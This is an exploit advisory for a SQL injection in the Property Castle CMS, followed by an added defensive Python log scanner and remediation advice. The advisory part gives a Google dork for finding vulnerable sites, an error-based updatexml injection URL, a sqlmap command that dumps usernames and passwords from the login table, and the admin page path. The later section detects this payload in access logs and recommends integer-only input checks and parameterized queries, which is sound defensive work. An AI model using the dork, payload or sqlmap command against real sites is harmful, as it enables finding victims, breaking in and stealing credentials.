# Exploit Title: Property Castle CMS POST SQL injection
# Google Dork: inurl:"/cms/cms.php?link_id="
# Date: 05/10/2015
# Exploit Author: Timoumi Houcem
# Tested on: Kali Linux, Iceweasel browser
# EXPLOIT
1- Get the database name: http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+
This returns the database name.
2- Find the "contact us" page.
3- Use "http header" to get the names of the POST data fields (all POST data fields are injectable; this example uses the first one).
4- Run the sqlmap tool against that form, injecting with the POST method.
EXAMPLE : [ sqlmap --url "http://website/user/controller/valuation/valuation-controller.php" --data "name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php" -p name -D [database_name] -T login -C username,password --dump ]
# Admin page: http://website/admin/index.php
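
For defenders, the GET request in step 1 leaves a recognisable trace in web server access logs. The following is an added example, not part of the original advisory: a log check that flags any `link_id` value that is not a plain integer and unwraps MySQL versioned comments such as `/*!50000concat*/` before matching. The log lines, IP addresses and function names are constructed for illustration. POST bodies (step 4) are normally absent from access logs and are not covered here.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL executes the body of /*!NNNNN ... */ comments, so unwrap them before matching.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
ERROR_BASED = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
SQL_TOKENS = re.compile(r"'|--|#|\b(and|or|union|select|concat|database)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Oct/2015:10:00:01 +0000] "GET /cms/cms.php?link_id=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Oct/2015:10:00:07 +0000] "GET /cms/cms.php?link_id=4%27+and+updatexml'
    '(null,/*!50000concat*/(0x3a3a,database()),null)--+ HTTP/1.1" 200 812',
    '203.0.113.9 - - [05/Oct/2015:10:00:09 +0000] "GET /cms/cms.php?link_id=4%27 HTTP/1.1" 200 640',
    '198.51.100.7 - - [05/Oct/2015:10:01:30 +0000] "GET /cms/cms.php?link_id=abc HTTP/1.1" 200 5120',
]

def normalize(value):
    """Unwrap versioned comments and blank ordinary ones, as the MySQL parser does."""
    return PLAIN_COMMENT.sub(" ", VERSIONED_COMMENT.sub(r"\1", value))

def classify_link_id(value):
    """Classify one decoded link_id value; only plain ASCII digits are legitimate."""
    if re.fullmatch(r"[0-9]+", value):
        return "ok"
    cleaned = normalize(value)
    if ERROR_BASED.search(cleaned):
        return "sqli-error-based"
    return "sqli" if SQL_TOKENS.search(cleaned) else "non-numeric"

def scan(lines):
    """Return (line_number, verdict) for every request whose link_id is not 'ok'."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        # parse_qsl URL-decodes %27 and '+' and keeps duplicate link_id parameters.
        for key, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
            verdict = classify_link_id(value) if key == "link_id" else "ok"
            if verdict != "ok":
                findings.append((number, verdict))
    return findings

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

The same integer-only rule applied to `link_id` in the application, together with parameterized queries for the form fields, removes the injection point rather than only detecting it.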